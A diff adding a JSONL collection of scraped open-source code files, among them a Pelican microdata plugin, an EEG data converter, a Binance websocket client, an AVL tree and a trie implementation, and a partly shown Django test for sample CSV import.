diff --git "a/526.jsonl" "b/526.jsonl" new file mode 100644--- /dev/null +++ "b/526.jsonl" @@ -0,0 +1,2168 @@ +{"seq_id":"20118979587","text":"# -*- coding: utf-8 -*-\n\"\"\"\nMicrodata markup for reStructuredText\n=====================================\n\nDirectives\n----------\n\n.. code-block:: ReST\n\n .. itemscope:: \n :tag: element type (default: div)\n\n Nested content\n\n\n :itemprop:`Displayed test `\n\n\nExamples\n--------\n\nThis reStructuredText document:\n\n.. code-block:: ReST\n\n .. itemscope: Person\n :tag: p\n\n My name is :itemprop:`Bob Smith `\n but people call me :itemprop:`Smithy `.\n Here is my home page:\n :itemprop:`www.exemple.com `\n I live in Albuquerque, NM and work as an :itemprop:`engineer `\n at :itemprop:`ACME Corp <affiliation>`.\n\n\nwill result in:\n\n.. code-block:: html\n\n <p itemscope itemtype=\"http://schema.org/Person\">\n My name is <span itemprop=\"name\">Bob Smith</span>\n but people call me <span itemprop=\"nickname\">Smithy</span>.\n Here is my home page:\n <a href=\"http://www.example.com\" itemprop=\"url\">www.example.com</a>\n I live in Albuquerque, NM and work as an <span itemprop=\"title\">engineer</span>\n at <span itemprop=\"affiliation\">ACME Corp</span>.\n </p>\n\n\"\"\"\nfrom __future__ import unicode_literals\n\nimport re\nimport six\n\nfrom docutils import nodes\nfrom docutils.parsers.rst import directives, Directive, roles\nfrom pelican.readers import PelicanHTMLTranslator\nfrom pelican.signals import initialized\n\nDEFAULT_PREFIX = \"http://schema.org\"\nMICRODATA_VOCABULARY_PREFIX = DEFAULT_PREFIX\n\nRE_ROLE = re.compile(r'(?P<value>.+?)\\s*\\<(?P<name>.+)\\>')\n\n\nclass ItemProp(nodes.Inline, nodes.TextElement):\n pass\n\n\ndef itemprop_role(role, rawtext, text, lineno, inliner, options={}, content=[]):\n match = RE_ROLE.match(text)\n if not match.group('value') and match.group('name'):\n raise ValueError('%s does not match expected itemprop format: :itemprop:`value <name>`')\n value = match.group('value')\n name = match.group('name')\n if ':' in name:\n name, href = name.split(':', 1)\n else:\n href = None\n return [ItemProp(value, value, name=name, href=href)], []\n\n\nclass ItemScope(nodes.Element):\n def __init__(self, tagname, itemtype, itemprop=None, compact=False):\n kwargs = {\n 'itemscope': None,\n 'itemtype': \"%s/%s\" % (MICRODATA_VOCABULARY_PREFIX, itemtype),\n }\n if itemprop:\n kwargs['itemprop'] = itemprop\n super(ItemScope, self).__init__('', **kwargs)\n self.tagname = tagname\n self.compact = tagname == 'p' or compact\n\n\nclass ItemScopeDirective(Directive):\n required_arguments = 1\n has_content = True\n option_spec = {\n 'tag': directives.unchanged,\n 'itemprop': directives.unchanged,\n 'compact': directives.unchanged,\n }\n\n def run(self):\n self.assert_has_content()\n itemtype = self.arguments[0]\n tag = self.options.get('tag', 'div')\n itemprop = self.options.get('itemprop', None)\n compact = 'compact' in self.options\n node = ItemScope(tag, itemtype, itemprop, compact)\n self.add_name(node)\n self.state.nested_parse(self.content, self.content_offset, node)\n return [node]\n\n\ndef visit_ItemProp(self, node):\n if node['href']:\n self.body.append(self.starttag(node, 'a', '', itemprop=node['name'], href=node['href']))\n else:\n self.body.append(self.starttag(node, 'span', '', itemprop=node['name']))\n\n\ndef depart_ItemProp(self, node):\n if node['href']:\n self.body.append('</a>')\n else:\n self.body.append('</span>')\n\n\ndef visit_ItemScope(self, node):\n tag = 
node.starttag().replace('itemscope=\"True\"', 'itemscope')\n self.body.append(tag)\n\n\ndef depart_ItemScope(self, node):\n self.body.append(node.endtag())\n\n\ndef visit_paragraph(self, node):\n if self.should_be_compact_paragraph(node) or (isinstance(node.parent, ItemScope) and node.parent.compact):\n self.context.append('')\n else:\n self.body.append(self.starttag(node, 'p', ''))\n self.context.append('</p>')\n\n\ndef as_method(func):\n return six.create_unbound_method(func, PelicanHTMLTranslator)\n\n\ndef set_vocabulary(pelican):\n global MICRODATA_VOCABULARY_PREFIX\n MICRODATA_VOCABULARY_PREFIX = pelican.settings.get('MICRODATA_VOCABULARY', DEFAULT_PREFIX)\n\n\ndef register():\n directives.register_directive('itemscope', ItemScopeDirective)\n roles.register_canonical_role('itemprop', itemprop_role)\n\n PelicanHTMLTranslator.visit_ItemProp = as_method(visit_ItemProp)\n PelicanHTMLTranslator.depart_ItemProp = as_method(depart_ItemProp)\n PelicanHTMLTranslator.visit_ItemScope = as_method(visit_ItemScope)\n PelicanHTMLTranslator.depart_ItemScope = as_method(depart_ItemScope)\n\n # handle compact parameter\n # TODO: find a cleaner way to handle this case\n PelicanHTMLTranslator.visit_paragraph = as_method(visit_paragraph)\n\n # Fetch settings on initialized\n initialized.connect(set_vocabulary)\n","repo_name":"noirbizarre/pelican-microdata","sub_path":"microdata/plugin.py","file_name":"plugin.py","file_ext":"py","file_size_in_byte":5023,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"61"} +{"seq_id":"38547072069","text":"from typing import List, Union, Optional\n\nfrom pydantic import AnyHttpUrl, BaseSettings, validator\n\n\nclass Settings(BaseSettings):\n SERVER_NAME: str = \"localhost\"\n SERVER_HOST: AnyHttpUrl = \"http://localhost:8000\"\n # BACKEND_CORS_ORIGINS is a JSON-formatted list of origins\n # e.g: '[\"http://localhost\", \"http://localhost:4200\", \"http://localhost:3000\", \\\n # \"http://localhost:8080\", \"http://local.dockertoolbox.tiangolo.com\"]'\n BACKEND_CORS_ORIGINS: List[AnyHttpUrl] = []\n\n @validator(\"BACKEND_CORS_ORIGINS\", pre=True)\n def assemble_cors_origins(cls, v: Union[str, List[str]]) -> Union[List[str], str]:\n if isinstance(v, str) and not v.startswith(\"[\"):\n return [i.strip() for i in v.split(\",\")]\n elif isinstance(v, (list, str)):\n return v\n raise ValueError(v)\n\n PROJECT_NAME: str = \"Response Cache API\"\n PROJECT_DESCRIPTION: str = \"Cache responses from different API servers.\"\n PROJECT_VERSION: str = \"0.0.1\"\n\n API_KEYS: List[str] = []\n API_KEY_NAME: str = \"api_key\"\n\n @validator(\"API_KEYS\", pre=True)\n def assemble_api_keys(cls, v: Union[str, List[str]]) -> Union[List[str], str]:\n if isinstance(v, str) and not v.startswith(\"[\"):\n return [i.strip() for i in v.split(\",\")]\n elif isinstance(v, (list, str)):\n return v\n raise ValueError(v)\n\n REDIS_HOST: str = \"localhost\"\n REDIS_PORT: int = 6379\n REDIS_DATABASE: int = 0\n REDIS_PASSWORD: Optional[str]\n\n # AIOHTTP\n AIOHTTP_USERAGENT: str = f\"response-cache-api ({PROJECT_VERSION})\"\n\n class Config:\n case_sensitive = True\n\n\nsettings = Settings()\n","repo_name":"mhajder/response-cache-api","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":1654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14619696918","text":"# coding: utf-8\n\nimport mne\nimport eeghdf\nimport eegvis.stacklineplot as stackplot\nimport 
matplotlib\nimport matplotlib.pyplot as plt\n\n#%% # data path\nDATAPATH='/mnt/home2/clee/code/eegml/eeghdf/data'\n#%%\n# check versions\n\nprint(matplotlib.__version__)\n#%%\nplt.rcParams['figure.figsize'] = (24,9)\n\n# start to make this into a function \n\n\ndef ehdf2mne(hf):\n \"\"\"@hf is an eeghdf Eeghdf object opened on a file\n from the stanford EEG corpus \"\"\"\n \n # start to make this into a function \n # find useful_channels\n\n useful_channels = []\n useful_channel_labels = []\n\n for ii, label in enumerate(hf.electrode_labels):\n if label.find('Mark') >= 0:\n continue\n if label.find('EEG') >= 0: # we use standard names\n useful_channels.append(ii)\n useful_channel_labels.append(label)\n\n # add ECG if there\n for ii, label in enumerate(hf.electrode_labels):\n if label.find('ECG') >= 0:\n useful_channels.append(ii)\n useful_channel_labels.append(label)\n\n print(list(zip(useful_channels, useful_channel_labels)))\n\n num_uchans = len(useful_channels)\n\n\n def label2type(name):\n \"\"\"lots of assumptions to use this as name is already limited\"\"\"\n try:\n if name[:6] == 'EEG Pg':\n return 'eog'\n except:\n pass\n\n if name[:3] == 'ECG':\n return 'ecg'\n if name[:3] == 'EEG':\n return 'eeg'\n return 'misc'\n\n\n\n channel_types = [label2type(label) for label in useful_channel_labels]\n print(channel_types)\n\n # now get rid of the prefixes\n uchan_names = [ss.split()[1] if ss[:3] == 'EEG' else ss \n for ss in useful_channel_labels]\n\n print('final view before sending to info')\n for ii, name in enumerate(uchan_names):\n print(ii, name, channel_types[ii])\n\n # finally remove the prefix 'EEG' from the label names\n\n\n # info - mne.create_info(num_uchans, hf.sample_frequency)\n info = mne.create_info(uchan_names, hf.sample_frequency, \n channel_types, montage='standard_1020')\n print(info)\n\n\n #montage = 'standard_1010' # might work\n\n # start on the data\n\n data = hf.phys_signals[useful_channels, :]\n\n # MNE wants EEG and ECG in Volts\n for jj, ii in enumerate(useful_channels):\n unit = hf.physical_dimensions[ii]\n if unit == 'uV':\n data[jj, :] = data[jj, :]/1000000\n if unit == 'mV':\n data[jj, :] = data[jj, :]/1000\n\n print(data.shape)\n # TODO: transfer recording and patient details. 
API ref \n # url: https://martinos.org/mne/dev/generated/mne.Info.html#mne.Info\n # TODO: next need to figure out how to add the events/annotations\n info['custom_ref_applied'] = True # for SEC this is true\n\n # events are a list of dict:\n\n # channels : list of int\n # Channel indices for the events.\n # event dict:\n # 'channels' : list|ndarray of int|int32 # channel indices for the events\n # 'list' : ndarray, shape (n_events * 3,)\n # triplets as number of samples, before, after.\n # I will need to see an example of this\n # info['highpass'], info['lowpass']\n\n info['line_freq'] = 60.0\n\n # info['subject_info'] = <dict>\n # subject_info dict:\n\n # id : int\n # Integer subject identifier.\n\n # his_id : str\n # String subject identifier.\n\n # last_name : str\n # Last name.\n\n # first_name : str\n # First name.\n\n # middle_name : str\n # Middle name.\n\n # birthday : tuple of int\n # Birthday in (year, month, day) format.\n\n # sex : int\n # Subject sex (0=unknown, 1=male, 2=female).\n\n # work on adding annotations \n starts_sec = [1e-7 * t100ns for t100ns in hf._annotation_start100ns]\n mne_annot = mne.Annotations(onset=starts_sec, duration=hf._annotation_durations_sec,\n description=hf._annotation_text)\n\n customraw = mne.io.RawArray(data, info)\n customraw.set_annotations(mne_annot) \n\n\n return customraw, info, useful_channels\n\n\n\nif __name__ == '__main__':\n#%%\n hf = eeghdf.Eeghdf(DATAPATH + '/absence_epilepsy.eeghdf')\n channel_number, num_samples = hf.phys_signals.shape\n print('original shape:', (channel_number, num_samples) )\n print('number channels:', hf.number_channels)\n\n#%% \n # the eeghdf annotations currently only have useful info about start\n # time and description. The duration field seems to always be cut\n # off but that may not always be the case\n # according to the edf spec \n # the durations are stored as text (ascii) numbers in seconds\n # if they are null I will consider duration = 0\n\n # hf.hdf['record-0']['edf_annotations']\n\n raw, info, chans = ehdf2mne(hf)\n\n raw.plot()\n","repo_name":"eegml/eeghdf","sub_path":"experiments/eeghdf2fif.py","file_name":"eeghdf2fif.py","file_ext":"py","file_size_in_byte":4789,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"24742939014","text":"#!/usr/bin/env python\n\nfrom mcn.scraper import Exchanges, Queues, settings\nfrom mcn.mq import Producer, Message\n\nimport argparse\n\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(\n \"-F\", \"--force\",\n action=\"store_true\", help=\"Skip throttling\"\n)\n\nparser.add_argument(\"-t\", \"--timeout\", type=float, default=0)\nparser.add_argument(\"url\", nargs=\"+\")\n\n\nif __name__ == \"__main__\":\n args = parser.parse_args()\n\n producer = Producer(\n Exchanges.DOWNLOAD,\n Queues.DOWNLOAD_DOCUMENT,\n url=settings.SCRAPER_AMQP_URL,\n )\n\n for url in args.url:\n msg = Message()\n msg.update(url=url)\n msg.update_meta(timeout=args.timeout)\n headers = dict()\n if args.force:\n headers.update(skip_throttling=True)\n producer.publish(msg, persistent=True, headers=headers)\n","repo_name":"mcptr/mcn","sub_path":"mcn-scraper/examples/enqueue-document-download.py","file_name":"enqueue-document-download.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"982900688","text":"from websockets.client import connect, WebSocketClientProtocol\nfrom websockets.exceptions import 
ConnectionClosed\nfrom logging import Logger, getLogger\nfrom typing import Optional, AsyncIterator, cast\nfrom orjson import loads, dumps\nfrom time import time\n\n\nclass BaseWebsocketClient:\n \"\"\"\n Websocket client class.\n \"\"\"\n\n _websocket: Optional[WebSocketClientProtocol] = None\n _subscriptions: set[str] = set()\n _base_url: str\n _logger: Logger\n\n def __init__(self, logger: Optional[Logger], testnet=False) -> None:\n self._base_url = (\n \"wss://testnet.binance.vision\"\n if testnet\n else \"wss://stream.binance.com:9443\"\n )\n self._logger = logger if logger else getLogger(__name__)\n\n async def _send_subscription(self, subscriptions: list[str], subscribe: bool):\n \"\"\"\n Sends a subscribe / unsubscribe message over websocket.\n \"\"\"\n if self._websocket:\n try:\n message = {\n \"method\": \"SUBSCRIBE\" if subscribe else \"UNSUBSCRIBE\",\n \"params\": subscriptions,\n \"id\": int(time() * 1000),\n }\n await self._websocket.send(dumps(message).decode(\"utf-8\")) # type: ignore\n except Exception as exc:\n self._logger.warning(f\"unable to send subscription message: {exc}\")\n else:\n self._logger.warning(\n \"unable to send subscription: websocket is disconnected\"\n )\n\n async def _stream(self, raw_stream: bool) -> AsyncIterator[dict]:\n \"\"\"\n Provides a stream of messages received over a connected websocket.\n \"\"\"\n # defines the kind of stream: raw or combined\n url = f\"{self._base_url}/ws\" if raw_stream else f\"{self._base_url}/stream\"\n\n # connects with binance server\n self._logger.info(f\"connecting websocket: {url}\")\n async with connect(uri=url, ssl=True) as websocket:\n try:\n # handles websocket connection\n self._logger.info(f\"connected websocket: {url}\")\n self._websocket = websocket\n\n # send subscriptions if there are any\n if self._subscriptions:\n self._logger.info(f\"subscribing to streams {self._subscriptions}\")\n await self._send_subscription(list(self._subscriptions), subscribe=True)\n\n # keep waiting for messages and process them\n async for data in websocket:\n \n # cast the received data to str so it type checks properly\n message = cast(str, data)\n\n # logs the received message for debug purposes\n self._logger.debug(f\"received raw message: {message}\")\n\n # it is a subscription response\n if message.startswith('{\"result\"'):\n self._logger.debug(\"ignoring subscription response\")\n\n # it is a new data message\n else:\n # parses the json object and passes as dict\n yield loads(message)\n\n except ConnectionClosed:\n self._logger.warning(f\"disconnected websocket: {url}\")\n self._websocket = None\n\n except Exception as exc:\n self._logger.error(f\"unknown error in websocket: {exc}\")\n","repo_name":"fhassis/binance-python","sub_path":"binance_python/base_ws_client.py","file_name":"base_ws_client.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15645617184","text":"import os\n\n## Project_directory\nproj_dir = './scene_text'\nresults_dir = './scene_text/results'\n\n## Scene Images Dir\nimg_dir = os.path.join(proj_dir,'img')\n\n## Binary Images Dir\nbinary_result_dir = os.path.join(proj_dir,'binary')\n\n## Ground truth .xml file paths \ntrain_xml_path = os.path.join(proj_dir,'train.xml')\ntest_xml_path = os.path.join(proj_dir,'test.xml')\n\n## Extracted ground truth paths\nclass_label_path = os.path.join(proj_dir,\"ground_truth.csv\")\n\n## OCR results :\n\notsu_text_extract_results_path = 
os.path.join(results_dir,\"otsu_text_extract_results_path.csv\")\nslide_otsu_text_extract_results_path = os.path.join(results_dir,\"slide_otsu_text_extract_results_path.csv\")\neval_results_path = os.path.join(results_dir,\"evaluation_results.csv\")\n\n\n# Directory Creation \nif not os.path.exists(proj_dir):\n os.makedirs(proj_dir)\n\nif not os.path.exists(results_dir):\n os.makedirs(results_dir)\n","repo_name":"sagar9926/SceneTextBinarisation","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16638176078","text":"class Node:\n def __init__(self):\n self.data = 0\n self.left = None \n self.right = None \n self.height = 1\n\ndef calculateBF(root):\n if root is None:\n return 0\n lh = 0\n rh = 0 \n if root.left != None:\n lh =root.left.height \n if root.right != None: \n rh = root.right.height \n return lh - rh \n\ndef calculateHeight(root):\n lh = 0\n rh = 0\n if root.left != None:\n lh =root.left.height \n if root.right != None: \n rh = root.right.height \n return max(lh,rh)\n\ndef leftRotate(root): #30 \n #set \n rootRight = root.right #50\n t = rootRight.left \n \n #rotation\n rootRight.left = root\n root.right = t \n\n #height \n root.height = 1+calculateHeight(root) \n rootRight.height = 1+calculateHeight(rootRight) \n\n return rootRight\ndef rightRotate(root):\n #set \n newRoot = root.left \n t = newRoot.right \n #rotate \n newRoot.right = root \n root.left = t \n \n root.height = 1+calculateHeight(root) \n newRoot.height = 1+calculateHeight(newRoot) \n\n return newRoot\n\ndef insert(root,data): # 500,350 300,350 400,350 None,350\n if root == None:\n root= Node()\n root.data = data \n return root \n else:\n if root.data > data : \n root.left = insert(root.left,data)\n else:\n root.right = insert(root.right,data)\n root.height = 1+calculateHeight(root) \n\n bf = calculateBF(root)#30 \n if bf <= -2 and root.right.data < data : #-2 -3 -4 \n #right right \n print(root.data,\" RR \") \n return leftRotate(root)\n\n\n elif bf >= 2 and root.left.data > data: #2 3 4 5 \n #left left \n print(root.data,\" LL \")\n return rightRotate(root)\n elif bf <= -2 and root.right.data > data : \n #right left \n print(root.data,\" RL \")\n root.right = rightRotate(root.right)\n return leftRotate(root)\n \n elif bf >= 2 and root.left.data < data: #2 3 4 5 \n #left right \n print(root.data,\" LR \")\n root.left = leftRotate(root.left)\n return rightRotate(root)\n \n \n return root \n\n\ndef inorder(root): #left-root-right \n if root != None:\n inorder(root.left)\n print(root.data,\"(\",root.height,\")\",end=\" \")\n inorder(root.right)\n\n\ndef deleteNode(root,data): #200,175\n if root is None: \n return root \n \n if root.data == data :\n #0 1 child -> left \n if root.left == None : \n tmp = root.right \n del root \n return tmp\n elif root.right == None: \n tmp = root.left \n del root\n return tmp \n else:\n #2 child \n success = root.right \n while success.left != None:\n success = success.left \n root.data = success.data \n return deleteNode(root.right,success.data)\n \n elif root.data > data :\n #left \n root.left = deleteNode(root.left,data)\n elif root.data < data :\n #right \n root.right = deleteNode(root.right,data)\n \n root.height = 1+calculateHeight(root) \n\n bf = calculateBF(root)#30 \n \n if bf <= -2 and root.right.data < data : #-2 -3 -4 \n #right right \n print(root.data,\" RR \") \n return leftRotate(root)\n\n\n elif bf >= 2 and root.left.data > 
data: #2 3 4 5 \n #left left \n print(root.data,\" LL \")\n return rightRotate(root)\n elif bf <= -2 and root.right.data > data : \n #right left \n print(root.data,\" RL \")\n root.right = rightRotate(root.right)\n return leftRotate(root)\n \n elif bf >= 2 and root.left.data < data: #2 3 4 5 \n #left right \n print(root.data,\" LR \")\n root.left = leftRotate(root.left)\n return rightRotate(root)\n \n return root\n\n\nroot = None\n\n\n\nwhile True: \n print(\"\\n0 For Exit\\n1 For Add\\n2 Print\\n3 For Delete\\nEnter choice\")\n choice = int(input())\n if choice == 1 :\n \n data = int(input(\"Enter data\")) # 350 \n root = insert(root,data) # 500,350 \n elif choice == 2:\n inorder(root)\n elif choice == 3:\n data = int(input(\"Enter data\"))\n root = deleteNode(root,data)\n elif choice == 0:\n exit(0)\n ","repo_name":"tejasshah2k19/23-club-ds-RK","sub_path":"avl_tree.py","file_name":"avl_tree.py","file_ext":"py","file_size_in_byte":4249,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"20568658816","text":"import random\n\n\ndef druk_kleinste_index(list, element):\n tel = list.count(element)\n print(\"{} occurs {} times\".format(element, tel))\n index = -1\n for i in range(tel):\n index = list.index(element, index + 1) # this way you start at index 0 and each pass through the loop adds 1\n print(\"at index\", index)\n\n\ndef main():\n # 100 numbers in a list, each >= 0 and < 10\n lijst = []\n for i in range(100):\n getal = random.randint(0, 9)\n lijst.append(getal)\n # the user enters a number. input validation!\n getal = int(input(\"enter a number \"))\n while not (getal >= 0 and getal < 10):\n getal = int(input(\"Invalid number entered. Enter it again \"))\n druk_kleinste_index(lijst, getal)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"SemihAltintasPXL/PXLToegepast-Informatica","sub_path":"Vakken_eerste_jaar/IT-Essentials/IT-Essentials-oefeningen/7_lists/Voorbeelden/Opgave_7.5.py","file_name":"Opgave_7.5.py","file_ext":"py","file_size_in_byte":785,"program_lang":"python","lang":"nl","doc_type":"code","stars":3,"dataset":"github-code","pt":"61"} +{"seq_id":"40470796040","text":"## given sorted array, with one missing number, the first element is not missing.\n# implement it in O(log n) time\n\nclass Solution(object):\n def missingNumber(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: int\n \"\"\"\n x = nums[0]\n y = x + 1\n n = len(nums)\n i, j = 0, n - 1\n while i < j:\n m = i + (j - i) // 2\n if nums[m] - m == y:\n if m != 0 and nums[m - 1] - (m - 1) == x:\n return nums[m] - 1\n else:\n j = m - 1\n else:\n i = m + 1\n\n return nums[i] - 1\n \nsol = Solution()\nnums = [1, 3, 4, 5, 6]\na = sol.missingNumber(nums)\nprint (a)\n","repo_name":"akb46mayu/Data-Structures-and-Algorithms","sub_path":"pythonPart/lu_findMissingNumber.py","file_name":"lu_findMissingNumber.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"30604344104","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport weibull\nfrom scipy import stats\nfrom sklearn.metrics import mean_squared_error\nfrom math import sqrt\n\n\nAnios = [2015, 2016, 2017, 2018]\n\nArchivo = 'Qollpana150914-270818.csv'\ndf = pd.read_csv(Archivo, index_col= False)\ndf[\"Fecha\"] = pd.to_datetime(df[\"Fecha\"])\n# filtering data by year\ndef weib(x,n,a):\n return (a / n) * (x / n)**(a - 1) * np.exp(-(x / n)**a)\ndef weibull_inv(p):\n return np.log(-np.log(1.0-p))\n\nmask = df.Fecha.dt.year == Anios[0]\ndf15 = 
df.loc[mask]\nmask = df.Fecha.dt.year == Anios[1]\ndf16 = df.loc[mask]\nmask = df.Fecha.dt.year == Anios[2]\ndf17 = df.loc[mask]\nmask = df.Fecha.dt.year == Anios[3]\ndf18 = df.loc[mask]\nmes = range(1,13)\n\nmask = df16.Fecha.dt.month == 12\ndfaux = df16.loc[mask]\nanalysis = weibull.Analysis(df16[\"Viento - Velocidad (m/s)\"], unit = \"m/s\")\nanalysis.fit(method='mle')\n# Capturing the Weibull parameters\nforma = analysis.stats[3]\nescala = analysis.stats[6]\ncount, bins, ignored = plt.hist(dfaux[\"Viento - Velocidad (m/s)\"],23)\nprint(max(dfaux[\"Viento - Velocidad (m/s)\"]))\nx = np.linspace(min(dfaux[\"Viento - Velocidad (m/s)\"]),max(dfaux[\"Viento - Velocidad (m/s)\"]),sum(count))\nscale = count.max()/weib(x,escala ,forma).max()\nprint(weib(x,escala,forma)*scale)\nplt.plot(x, weib(x,escala,forma)*scale)\n#plt.savefig(\"Weibpdf\"+mes+Anios+\".png\")\nplt.show()\n#******************************************************************\n#\t\t\t\t\tCorrelation analysis \n#******************************************************************\n#Sorting the data according to stress values and re-indexing\ndfaux = dfaux.sort_values(by='Viento - Velocidad (m/s)')\ndfaux = dfaux.reset_index(drop=True)\ndfaux['Proba'] = (dfaux.index - dfaux.index[0]+1) / (len((dfaux.index))+1)\nprint(dfaux)\ndfaux['Weibull'] = weibull_inv(dfaux['Proba'])\nw = dfaux['Weibull']\nlnsw = np.log(dfaux['Viento - Velocidad (m/s)'])\nm, lnsm0, *t = stats.linregress(lnsw,w)\nsigma0 = np.exp(- lnsm0 / m)\nprint('m=', m)\nprint('sigma0=',sigma0)\nplt.figure()\nplt.plot(lnsw,w)\nplt.plot(lnsw,w,'*')\nx = lnsw\ny = (lambda x : m * x + lnsm0)(x)\nplt.plot(x, y)\nplt.plot()\nplt.grid()\nplt.ylabel('log(-log(1 - Probability of fracture))')\nplt.title(\"Weibull Analysis of experiment data\")\nrms = sqrt(mean_squared_error(y, w))\nr, p = stats.pearsonr(y,w)\nplt.text(0,1,r\"$r^2 =$\"+\"{0:.4f}\".format(r))\nplt.text(0,2,r\"$RMSE =$\"+\"{0:.4f}\".format(rms))\n#plt.savefig(\"WeibCorr\"+mes+str(Anios)+\".png\")\nplt.show()\nprint(y.shape)\nprint(w.shape)\nprint(\"correlation coefficient: \",r)\nprint(\"RMSE :\", rms)","repo_name":"Lionhardv2/Test","sub_path":"Gweib3.py","file_name":"Gweib3.py","file_ext":"py","file_size_in_byte":2565,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18493068269","text":"from django.urls import path\nfrom . 
views import search, search_results, product_category\n\napp_name = 'search'\n\nurlpatterns = [\n\tpath('', search, name=\"search\"),\n\tpath('results/', search_results, name=\"search-results\"),\n\tpath('<category>/', product_category, name='category-detail'),\n]\n","repo_name":"ey7/project-four","sub_path":"search/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":286,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"69986890434","text":"import sys\n\n\nclass Node:\n\n def __init__(self, key):\n self.label = key\n self.edges = {}\n self.e_lbl = {}\n\n def get_label(self):\n return self.label\n\n def change_label(self, key):\n self.label = key\n\n def add_edge(self, v, w):\n self.edges[v] = w\n self.e_lbl[w] = v\n\n def remove_edge(self, v):\n w = self.edges[v]\n self.edges.pop(v)\n self.e_lbl.pop(w)\n\n def edge_label(self, v):\n return self.edges[v]\n\n def output_edges(self):\n return self.edges.items()\n\n def neighbors(self):\n return self.edges.keys()\n\n def neighbor_by_label(self, w):\n if w in self.e_lbl:\n return self.e_lbl[w]\n else:\n return -1\n\n\ndef trie_construction(patterns):\n trie = {0: Node(0)}\n cur_key = 1\n for pattern in patterns:\n cur_node = trie[0]\n for ch in pattern:\n v = cur_node.neighbor_by_label(ch)\n if v > -1:\n cur_node = trie[v]\n else:\n v = cur_key\n v_node = Node(v)\n trie[v] = v_node\n cur_node.add_edge(v, ch)\n cur_node = v_node\n cur_key += 1\n return trie\n\n\ndef main():\n patterns = []\n for line in sys.stdin:\n patterns.append(line.strip())\n trie = trie_construction(patterns)\n for u in trie:\n node = trie[u]\n for edge in node.output_edges():\n v, w = edge\n print(str(u) + '->' + str(v) + ':' + w)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"Leoberium/BA","sub_path":"Chapter9/BA9A.py","file_name":"BA9A.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"3917895198","text":"from __future__ import absolute_import\nimport os\nfrom six import BytesIO\nfrom django.db import IntegrityError\nfrom sentry.testutils import TestCase\nfrom sentry.models.file import File\nfrom clims.services.file_service.csv import Csv\nfrom clims.models.file import OrganizationFile\nfrom clims.models.substance import Substance\nfrom clims.handlers import HandlerContext\nfrom commonlims.utility.test_utils import create_plugin\nfrom commonlims.utility.gemstone_sample import GemstoneSample\nfrom commonlims.utility.submission_handler import GemstoneSubmissionHandler\nfrom commonlims.test.resources.resource_bag import gemstone_csv_path\nfrom commonlims.test.resources.resource_bag import read_gemstone_csv\n\n\nclass TestSampleSubmissionCsv(TestCase):\n def setUp(self):\n plugin = create_plugin(self.organization)\n self.register_extensible(GemstoneSample, plugin)\n self.handler_context = HandlerContext(self.organization)\n\n def _create_csv_organization_file(self):\n name = os.path.basename(gemstone_csv_path())\n file_model = File.objects.create(\n name=name,\n type='substance-batch-file',\n headers=list(),\n )\n contents = read_gemstone_csv()\n file_like_obj = BytesIO(contents)\n file_model.putfile(file_like_obj)\n return OrganizationFile(name=name, organization=self.organization, file=file_model)\n\n def test_import_csv_here__with_6_gemstone_samples__6_sample_instances_created(self):\n csv = Csv(gemstone_csv_path())\n created_samples = []\n for line in csv:\n name = line['Sample 
ID']\n preciousness = line['Preciousness']\n color = line['Color']\n props = {\n 'preciousness': preciousness,\n 'color': color,\n }\n sample = self.app.extensibles.create(\n name, GemstoneSample, self.organization, properties=props)\n created_samples.append(sample)\n self.assertEqual(6, len(created_samples))\n\n def test_file_blob(self):\n name = os.path.basename(gemstone_csv_path())\n file_model = File.objects.create(\n name=name,\n type='substance-batch-file',\n headers=list(),\n )\n contents = read_gemstone_csv()\n file_like_obj = BytesIO(contents)\n file_model.putfile(file_like_obj)\n myfile = OrganizationFile(name=name, organization=self.organization, file=file_model)\n with file_model.getfile() as src:\n for chunk in src.chunks():\n print(type(chunk))\n print(chunk)\n\n assert 1 == 1\n\n def test_investigate_getfile(self):\n myfile = self._create_csv_organization_file()\n for ix, line in enumerate(myfile.file.getfile()):\n print(line)\n assert 1 == 1\n\n def test_import_with_organization_file(self):\n myfile = self._create_csv_organization_file()\n csv = myfile.as_csv()\n created_samples = []\n for line in csv:\n name = line['Sample ID']\n preciousness = line['Preciousness']\n color = line['Color']\n props = {\n 'preciousness': preciousness,\n 'color': color,\n }\n sample = self.app.extensibles.create(\n name, GemstoneSample, self.organization, properties=props)\n created_samples.append(sample)\n self.assertEqual(6, len(created_samples))\n assert 'gemstone1-project1' == created_samples[0].name\n\n def test_run_gemstone_sample_submission_handler__with_csv__6_samples_found_in_db(self):\n handler = GemstoneSubmissionHandler(context=self.handler_context, app=self.app)\n sample_sub_file = self._create_csv_organization_file()\n handler.handle(sample_sub_file)\n all_samples = Substance.objects.all()\n expected_sample_names = [\n 'gemstone1-project1',\n 'gemstone2-project1',\n 'gemstone3-project1',\n 'gemstone4-project1',\n 'gemstone5-project1',\n 'gemstone6-project1',\n ]\n all_sample_names = [sample.name for sample 